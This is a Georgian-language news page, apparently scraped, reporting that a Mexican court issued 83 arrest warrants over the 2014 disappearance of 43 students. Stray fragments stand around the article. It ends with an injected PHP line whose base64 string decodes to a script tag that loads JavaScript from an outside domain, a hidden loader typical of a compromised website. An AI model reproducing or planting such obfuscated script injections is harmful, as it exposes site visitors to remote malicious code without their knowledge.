celsiusi
ავერსი შნაიდერი
მექსიკის სასამართლომ 43 სტუდენტის გაუჩინარებასთან დაკავშირებით, 83 დაკავების ორდერი გასცა, - ამის შესახებ ინფორმაციას CNN ავრცელებს.
 
გამოცემის ცნობით, დაკავების ორდერი იმ პირების მიმართ გაიცა, რომლებიც სავარაუდოდ 2014 წელს 43 სტუდენტის გაუჩინარებაში მონაწილეობდნენ.
 
მექსიკის პროკურატურის ინფორმაციით, დაკავების ბრძანებები გაიცა: 20 სამხედრო მეთაურის და ჯარის პერსონალის, ასევე  5 ადმინისტრაციული და სასამართლო ხელისუფლების, 44 პოლიციელის და 14 კრიმინალური ჯგუფის მიმართ.
 
არსებული ინფორმაციით, მათ ორგანიზებული დანაშაული, იძულებით გაუჩინარება, წამება და მკვლელობა ედება ბრალად. 
 
ცნობისთვის, შემთხვევა 2014 წლის სექტემბერში მოხდა. სტუდენტთა 100-კაციანი ჯგუფიდან გადარჩენილებმა თქვეს, რომ მათი ავტობუსები შეიარაღებულმა პოლიციელებმა და ჯარისკაცებმა გააჩერეს, რომლებმაც მოულოდნელად ცეცხლი გახსნეს. 
464
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");